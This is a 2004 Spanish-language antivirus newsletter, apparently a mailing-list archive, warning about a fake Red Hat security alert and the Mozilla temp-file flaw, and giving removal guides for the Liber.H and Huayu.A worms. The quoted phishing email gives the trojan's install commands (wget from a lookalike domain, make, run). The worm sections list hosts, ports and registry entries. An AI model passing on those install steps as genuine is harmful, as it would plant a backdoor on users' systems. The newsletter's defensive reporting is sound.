Mostrando mensaje 621     < Anterior | Siguiente > Responder a este mensaje Asunto: VSantivirus No. 1572 Año 8, martes 26 de octubre de 2004 Fecha: Martes, 26 de Octubre, 2004  03:42:55 (-0200) Autor: VSAntivirus.com <vsantivirus @...........com> VSantivirus No. 1572 Año 8, martes 26 de octubre de 2004 _____________________________________________________________ El boletín diario de VSANTIVIRUS - http://www.vsantivirus.com VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy _____________________________________________________________ 1 - Falso mensaje de alerta a usuarios de Red Hat Fedora 2 - Acceso a documentos de otros usuarios en Mozilla 3 - W32/Liber.H. Se propaga en un mensaje sobre Iraq 4 - W32/Huayu.A. Utiliza el exploit en proceso LSASS _____________________________________________________________ 1 - Falso mensaje de alerta a usuarios de Red Hat Fedora _____________________________________________________________ http://www.vsantivirus.com/ev-25-10-04.htm Falso mensaje de alerta a usuarios de Red Hat Fedora Por Enciclopedia Virus (*) http://www.enciclopediavirus.com/ [Publicado con autorización de Enciclopedia Virus] Un mensaje falso que pretende ser enviado por Red Hat Security Team, ha estado circulando por Internet. El texto invita a los usuarios de Red Hat Fedora Linux, a descargar e instalar actualizaciones maliciosas, que pretenden comprometer la seguridad de sus equipos. El mensaje contiene el siguiente texto: Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: * First download the patch from the Security RedHat mirror: wget www .fedora-redhat .com/fileutils-1.0.6.patch.tar.gz * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz * cd fileutils-1.0.6.patch * make * ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team. Cuando el usuario descarga y ejecuta este parche, el troyano puede realizar las siguientes acciones: 1. Crear un usuario "bash" sin contraseña 2. Capturar la dirección IP y la hora de ejecución 3. Ejecutar SSHd 4. Enviar esta información a la dirección "root @ addlebrain .com" * Más información: Fedora-Redhat Fake Security Alert / Trojan Source Code & Analysis http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt (*) Este artículo, original de Enciclopedia Virus http://www.enciclopediavirus.com, es publicado en VSAntivirus.com con la respectiva autorización. Los derechos de republicación para su uso en otro medio, deberán solicitarse en http://www.enciclopediavirus.com/contacto/index.php Artículo original: www.enciclopediavirus.com/noticias/verNoticia.php?id=494 (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 2 - Acceso a documentos de otros usuarios en Mozilla _____________________________________________________________ http://www.vsantivirus.com/vul-mozilla-261004.htm Acceso a documentos de otros usuarios en Mozilla Por Angela Ruiz angela@videosoft.net.uy Ha sido reportado una vulnerabilidad que afecta a Mozilla Thunderbird (componente de correo y noticias) y Mozilla Firefox (navegador de Internet) cuando se ejecutan bajo Linux, y que permite que usuarios locales puedan acceder a información de otros usuarios. La vulnerabilidad es causada por un manejo inapropiado de los permisos de los archivos descargados, al ser abiertos por aplicaciones externas. Esto puede ser explotado para acceder a los archivos adjuntos o documentos de otros usuarios, a través de la ventana de descarga de estas aplicaciones. Cuando se abre un archivo adjunto o un enlace incluido en un correo electrónico, Thunderbird pregunta al usuario a través de una ventana de diálogo, si desea grabarlo al disco o abrirlo con un programa por defecto. Por ejemplo, si se recibe un documento PDF como adjunto, y se selecciona abrir, mientras el cuadro de diálogo permanece abierto, los permisos en el directorio de archivos temporales permiten la lectura y escritura de los mismos al usuario actual, y se borran cuando se cierra la ventana. Pero si en cambio se selecciona abrir con el programa por defecto (XPDF en el caso de los PDF), al cerrar la ventana los permisos de lectura y escritura de los archivos afectados no solo quedan habilitados, sino que además adquieren permisos de lectura para todos los demás usuarios. La vulnerabilidad reportada afecta las siguientes versiones de Mozilla bajo Linux: - Mozilla 1.7 a 1.7.3. - Firefox 0.9 a 1.0PR. - Thunderbird 0.6 a 0.8. * Créditos: Martin (broadcast@ptraced.net) * Referencias: Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local) http://broadcast.ptraced.net/advisories/008-firefox.thunderbird.txt Bugzilla Bug 251297 - files in /tmp world readable (email attachments, helper app docs) https://bugzilla.mozilla.org/show_bug.cgi?id=251297 (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 3 - W32/Liber.H. Se propaga en un mensaje sobre Iraq _____________________________________________________________ http://www.vsantivirus.com/liber-h.htm Nombre: W32/Liber.H Nombre Nod32: Win32/Liber.H Tipo: Gusano de Internet Alias: Liber.H, Win32/Liber.H, W32/Famus.B.worm Fecha: 25/oct/04 Plataforma: Windows 32-bit Tamaño: 155,647 bytes Este gusano, escrito en Visual Basic y de origen cubano, fue detectado el 25 de octubre de 2004. El gusano utiliza la librería MSVBVM60.DLL de Windows (Visual Basic Virtual Machine), de modo que puede fallar en aquellos sistemas que no la tengan. La misma es instalada por otras aplicaciones como Office por ejemplo. Cuando el gusano está activo en memoria, el rendimiento general de la computadora infectada puede caer sensiblemente. Al ejecutarse, el gusano muestra una ventana de error falsa, con el siguiente texto: File corrupted File corrupted or bad format [ Aceptar ] Inmediatamente después crea los siguientes archivos en el sistema: c:\recycled\iraq.scr c:\windows\system32\iraq.scr c:\windows\system32\smtp.ocx c:\j.jpg c:\Libertad de expresion para Cuba!!!!!! NOTA: "c:\windows\system32" puede variar de acuerdo al sistema operativo instalado (con ese nombre por defecto en Windows XP y Windows Server 2003, como "c:\winnt\system32" en Windows NT y 2000 y "c:\windows\system" en Windows 9x y ME). Los archivos copiados son los siguientes: - IRAQ.SCR (155,647 bytes) es el gusano propiamente dicho. - SMTP.OCX (90,112 bytes), es una librería estándar utilizada para el envío de sus mensajes. - LIBERTAD DE EXPRESION PARA CUBA!!!!!! es el nombre de un archivo de 0 bytes creado en el raíz de la unidad C: - J.JPG, es una imagen que contiene el texto "Password:iraq" Para autoejecutarse en cada reinicio, el gusano crea la siguiente entrada: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Sav32 = c:\recycled\iraq.scr Si la carpeta C:\RECYCLED no existe en la computadora infectada, el gusano no la crea. Cómo en Windows XP, por defecto esta carpeta (la papelera de reciclaje), no existe con ese nombre, el gusano no se ejecutará luego del primer reinicio (aunque si realizará el resto de sus acciones). Cuando la computadora se reinicia (no en XP), el gusano vuelve a mostrar el mensaje de error anterior. La única opción posible para continuar, es pulsar el botón aceptar o cerrar la ventana con el aspa de cierre. En cualquiera de los dos casos, en ese momento se mostrará una pantalla negra que ocupa todo el espacio del monitor, con el siguiente texto en letras blancas: Esta computadora ha sido infectada por el virus LIBERTAD. Como protesta por la violación del derecho a la libertad de expresión en Cuba. En estos momentos toda la información de su disco duro esta siendo borrada El Hobbit A pesar de lo que indica el mensaje, el gusano no borra ningún archivo. La pantalla negra generada solo oculta el escritorio de Windows. Un usuario puede detener el proceso del gusano, si pulsa en ese momento CTRL+ALT+DEL y selecciona en la lista de aplicaciones, la llamada SCAN, o en la lista de procesos, IRAQ.SCR. El gusano puede propagarse en un mensaje como el siguiente (o ser enviado en forma de spam con otro mensaje): Asunto: Iraq and the crime Texto del mensaje: Password:iraq what is really happening in Iraq? the pictures of the soldiers and prisoners in Iraq foward this message. everybody should know the truth. Qué está sucediendo realmente en Iraq? Estas son las fotos de los prisioneros y los soldados en Iraq. Reenvia este mensaje, todo el mundo debe saber la verdad. Datos adjuntos: IRAQ.ZIP El adjunto está protegido por contraseña, la cuál se indica en el texto del mensaje. Las direcciones a las que se envía, son tomadas de archivos de la máquina infectada, con las siguientes extensiones: .dbx .doc .doc .eml .htm .htt .wab En el código del gusano, se encuentran también las siguientes direcciones y textos: hobbit @ cubalibre .com internetprovider .com MICROSOFT SEGURMATICA NORTON VIR KASPER LOCALHOST DAEMON * Reparación manual * Antivirus Actualice sus antivirus con las últimas definiciones, luego siga estos pasos: 1. Reinicie Windows en modo a prueba de fallos, como se indica en este artículo: Cómo iniciar su computadora en Modo a prueba de fallos. http://www.vsantivirus.com/faq-modo-fallo.htm 2. Ejecute sus antivirus en modo escaneo, revisando todos sus discos duros. 3. Borre los archivos detectados como infectados. * Borrar manualmente archivos agregados por el virus Desde el Explorador de Windows, localice y borre los siguientes archivos: c:\recycled\iraq.scr c:\windows\system32\iraq.scr c:\windows\system32\smtp.ocx c:\j.jpg c:\Libertad de expresion para Cuba!!!!!! Haga clic con el botón derecho sobre el icono de la "Papelera de reciclaje" en el escritorio, y seleccione "Vaciar la papelera de reciclaje". * Editar el registro 1. Ejecute el editor de registro: Inicio, ejecutar, escriba REGEDIT y pulse ENTER 2. En el panel izquierdo del editor, haga clic en el signo "+" hasta abrir la siguiente rama: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion \Run 3. Haga clic en la carpeta "Run" y en el panel de la derecha, bajo la columna "Nombre", busque y borre la siguiente entrada: Sav32 4. Use "Registro", "Salir" para salir del editor y confirmar los cambios. 5. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar). * Información adicional * Mostrar las extensiones verdaderas de los archivos Para poder ver las extensiones verdaderas de los archivos y además visualizar aquellos con atributos de "Oculto", proceda así: 1. Ejecute el Explorador de Windows 2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú 'Herramientas' (Windows Me/2000/XP), y haga clic en 'Opciones' u 'Opciones de carpetas'. 3. Seleccione la lengüeta 'Ver'. 4. DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar. 5. En Windows 95/NT, MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar. En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos los archivos'. En Windows Me/2000/XP, en 'Archivos y carpetas ocultos', MARQUE 'Mostrar todos los archivos y carpetas ocultos' y DESMARQUE 'Ocultar archivos protegidos del sistema operativo'. 6. Haga clic en 'Aplicar' y en 'Aceptar'. * Limpieza de virus en Windows Me y XP Si el sistema operativo instalado es Windows Me o Windows XP, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en estos artículos: Limpieza de virus en Windows Me http://www.vsantivirus.com/faq-winme.htm Limpieza de virus en Windows XP http://www.vsantivirus.com/faq-winxp.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ 4 - W32/Huayu.A. Utiliza el exploit en proceso LSASS _____________________________________________________________ http://www.vsantivirus.com/huayu-a.htm Nombre: W32/Huayu.A Tipo: Gusano de Internet y Caballo de Troya Alias: Huayu, W32.Huayu Fecha: 25/oct/04 Plataforma: Windows 32-bit Tamaño: 49,152 bytes Puertos: TCP 887 Este gusano que explota la vulnerabilidad de desbordamiento de búfer en el proceso LSASS de Windows (ver "MS04-011 Actualización crítica de Windows (835732)", http://www.vsantivirus.com/vulms04-011.htm). Solo se propaga por las direcciones IP entre la 211.159.93.0 y la 211.159.93.255. Este gusano abre una puerta trasera en las computadoras infectadas. Cuando se ejecuta, se copia en la siguiente ubicación: c:\windows\Rundll.exe NOTA: La carpeta "c:\windows" puede variar de acuerdo al sistema operativo instalado ("c:\winnt" en NT, "c:\windows", en 9x, Me, XP, etc.). Crea la siguiente entrada en el registro, para autoejecutarse en cada reinicio: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RundllSvr = c:\windows\Rundll.exe Envía un mensaje de notificación a la siguiente dirección electrónica: huayuguke @ yahoo .com .cn Abre una puerta trasera en el siguiente puerto: TCP/887 Escanea el siguiente rango de direcciones IP, buscando equipos vulnerables al desbordamiento de búfer en el proceso LSASS: 211.159.84.0 [...] 211.159.93.255 Nota: el rango 211.159.0.0 - 211.159.127.255, está asignado a un proveedor chino (GSNET). Si localiza equipos vulnerables, la computadora remota puede utilizar FTP para descargar el gusano de la dirección 218.2.107.35. El archivo es copiado en la siguiente ubicación: c:\archivos de programa\Rundll32.exe La carpeta "C:\Archivos de Programa" puede variar en sistemas con otros idiomas (C:\Program Files, etc.). * Reparación manual NOTA: Tenga en cuenta que de acuerdo a las acciones realizadas por el atacante remoto, pueden aplicarse cambios en el sistema no contemplados en esta descripción genérica. IMPORTANTE: Después de la limpieza, no conectar el equipo a Internet, hasta instalar el parche para la vulnerabilidad LSASS (MS04- 011). Si es necesario, descargarlo antes de proceder al resto de la limpieza, desde el siguiente enlace para instalarlo posteriormente: MS04-011 Actualización crítica de Windows (835732) http://www.vsantivirus.com/vulms04-011.htm * Métodos para detener el reinicio de Windows La descarga del parche correspondiente, puede verse dificultada por el constante reinicio del equipo infectado (un efecto secundario del exploit que se vale de la vulnerabilidad en el componente LSASS). Para evitarlo, siga cualquiera de estos métodos: 1. Simplemente atrase el reloj del sistema una o dos horas (ajústelo nuevamente a la hora correcta luego de la instalación del parche). 2. Desde Inicio, Ejecutar, escriba CMD y pulse Enter. Luego ingrese el siguiente comando (más Enter): shutdown -a * Sobre el componente troyano Nota: Recomendamos utilizar un programa tipo firewall (cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá la conexión de este y cualquier otro troyano con Internet, así como cualquier intento de acceder a nuestro sistema. ZoneAlarm (gratuito para su uso personal), además de ser un excelente cortafuegos, también impide la ejecución de cualquier adjunto con posibilidades de poseer virus (sin necesidad de tener que actualizarlo con cada nueva versión de un virus). Más información: Cómo configurar Zone Alarm 3.x http://www.vsantivirus.com/za.htm * Antivirus Actualice sus antivirus con las últimas definiciones, luego siga estos pasos: 1. Reinicie Windows en modo a prueba de fallos, como se indica en este artículo: Cómo iniciar su computadora en Modo a prueba de fallos. http://www.vsantivirus.com/faq-modo-fallo.htm 2. Ejecute sus antivirus en modo escaneo, revisando todos sus discos duros. 3. Borre los archivos detectados como infectados. * Borrar manualmente archivos agregados por el virus Desde el Explorador de Windows, localice y borre los siguientes archivos: c:\archivos de programa\Rundll32.exe c:\windows\Rundll.exe Haga clic con el botón derecho sobre el icono de la "Papelera de reciclaje" en el escritorio, y seleccione "Vaciar la papelera de reciclaje". * Editar el registro Nota: algunas de las ramas en el registro aquí mencionadas, pueden no estar presentes ya que ello depende de que versión de Windows se tenga instalada. 1. Ejecute el editor de registro: Inicio, ejecutar, escriba REGEDIT y pulse ENTER 2. En el panel izquierdo del editor, haga clic en el signo "+" hasta abrir la siguiente rama: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion \Run 3. Haga clic en la carpeta "Run" y en el panel de la derecha, bajo la columna "Nombre", busque y borre la siguiente entrada: RundllSvr = c:\windows\Rundll.exe 4. Use "Registro", "Salir" para salir del editor y confirmar los cambios. 5. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar). * Información adicional * Cambio de contraseñas En el caso de haber sido infectado con este troyano, se recomienda llevar a cabo las acciones necesarias a fin de cambiar todas las claves de acceso, así como toda otra información que comprometa la información relacionada con cualquier clase de transacción bancaria, incluidas sus tarjetas electrónicas y cuentas bancarias. * Activar el cortafuegos de Windows XP (Internet Conexión Firewall, ICF) Para activar ICF en Windows XP, siga estos pasos: 1. Seleccione Inicio, Panel de Control, Conexiones de Red (o Conexiones de Red e Internet, Conexiones de Red). 2. Haga clic con el botón derecho sobre las distintas conexiones disponibles para conectarse a Internet, y en "Conexión de Red de Area Local" y seleccione Propiedades en cada una de ellas. 3. En la lengüeta "Avanzadas" tilde la opción "Proteger mi equipo y mi red limitando o impidiendo el acceso a él desde Internet" en todos los casos. 4. Seleccione Aceptar, etc. * Mostrar las extensiones verdaderas de los archivos Para poder ver las extensiones verdaderas de los archivos y además visualizar aquellos con atributos de "Oculto", proceda así: 1. Ejecute el Explorador de Windows 2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú 'Herramientas' (Windows Me/2000/XP), y haga clic en 'Opciones' u 'Opciones de carpetas'. 3. Seleccione la lengüeta 'Ver'. 4. DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar. 5. En Windows 95/NT, MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar. En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos los archivos'. En Windows Me/2000/XP, en 'Archivos y carpetas ocultos', MARQUE 'Mostrar todos los archivos y carpetas ocultos' y DESMARQUE 'Ocultar archivos protegidos del sistema operativo'. 6. Haga clic en 'Aplicar' y en 'Aceptar'. * Limpieza de virus en Windows Me y XP Si el sistema operativo instalado es Windows Me o Windows XP, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en estos artículos: Limpieza de virus en Windows Me http://www.vsantivirus.com/faq-winme.htm Limpieza de virus en Windows XP http://www.vsantivirus.com/faq-winxp.htm (c) Video Soft - http://www.videosoft.net.uy (c) VSAntivirus - http://www.vsantivirus.com _____________________________________________________________ Pautas generales para mantenerse alejado de los virus _____________________________________________________________ Recuerde estas pautas para mantener alejado de su computadora cualquier riesgo de virus o troyanos: 1) Use regularmente un programa antivirus (nosotros siempre recomendamos no confiar en uno solo, pero usar más de uno no significa que debamos tenerlos a todos instalados, simplemente ejecutamos esos antivirus en su opción de escaneo, sobre la carpeta que contenga los archivos a revisar). Y por supuesto, de nada vale usar algún antivirus si no lo mantenemos actualizado con los upgrades, updates o add-ons correspondientes. Actualmente, las actualizaciones son diarias (AVP, Panda y otros) o al menos semanales. No existen los "virus demasiados nuevos y sin antídotos", la reacción de las casas de antivirus es inmediata en todos los casos. Pero mejor pregúntese, si la suya también lo es a la hora de actualizarse. 2) No abrir ningún mensaje ni archivo recibido a través del correo electrónico de fuentes desconocidas o muy poco conocidas. En el caso de personas conocidas, se deben igualmente tomar las precauciones correspondientes. Asegurarse con esa persona del envío ("Melissa" y otros pueden ser enviados por conocidos que ignoran estar mandando el virus en sus mensajes), y nunca ejecutarlos, sino guardarlos en una carpeta temporal y pasarle a esa carpeta dos o tres antivirus actualizados antes de tomar la opción de ejecutarlos (.EXE) o abrirlos (.DOC, .RTF, etc.). Pero ante cualquier duda, simplemente se debe optar por borrar el mensaje (y archivos adjuntos). Como se dice vulgarmente, "la confianza mata al hombre", en este caso a la PC. 3) Estar informado de cómo operan los virus, y de las novedades sobre estos, alertas y anuncios críticos, en sitios como el nuestro. 4) No bajar nada de sitios Web de los que no tenga referencias de seriedad, o que no sean medianamente conocidos. Y si se bajan archivos, proceder como los archivos adjuntos. Copiarlos a una carpeta y revisarlos con dos o tres antivirus actualizados antes de optar por ejecutarlos o abrirlos. _____________________________________________________________ Sobre este boletín _____________________________________________________________ La distribución de este boletín es gratuita, y está amparada bajo los derechos de Copyright registrados por Video Soft (también los artículos publicados directamente en nuestra página). Si usted desea usar esta información en cualquier medio escrito o electrónico, puede hacerlo sin solicitarnos el permiso respectivo, con la única condición de mencionar su origen, y remitirnos un e-mail o ejemplar con la ubicación donde se haga referencia al material usado que haya sido sacado de este boletín o de la página de VSAntivirus. Video Soft, Video Soft BBS, VSAntivirus y VSAyuda son marcas registradas. Los artículos de otros autores han sido incluidos de acuerdo a la política de Copyright adoptada por cada uno de ellos, y su inclusión en nuestro boletín se rige por dichas políticas, sin embargo, para su uso en otro medio, se deberá solicitar la debida autorización.- _____________________________________________________________ Visite diariamente nuestra página. Puede bajar de allí las versiones de evaluación actualizadas de los antivirus más usados o que consideramos por nuestra experiencia más confiables. El criterio de selección solo pasa por nuestra experiencia diaria con usuarios y clientes, a los que asesoramos y damos servicio técnico. _____________________________________________________________ Cualquier duda o comentario sobre esta lista de correo, envíe un e-mail a cualquiera de estas direcciones: jllopez@nativo.com videosoft@videosoft.net.uy _____________________________________________________________ VSANTIVIRUS - Sitio oficial: http://www.vsantivirus.com _____________________________________________________________ Altas: http://listas.vsantivirus.com/lista/vsantivirus/alta Bajas: http://listas.vsantivirus.com/lista/vsantivirus/baja También puede enviar un mensaje vacío a estas direcciones: Altas: vsantivirus-alta@listas.vsantivirus.com Bajas: vsantivirus-baja@listas.vsantivirus.com _____________________________________________________________ VSANTIVIRUS - http://www.vsantivirus.com - Es un servicio de VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy _____________________________________________________________ VSantivirus No. 1572 Año 8, martes 26 de octubre de 2004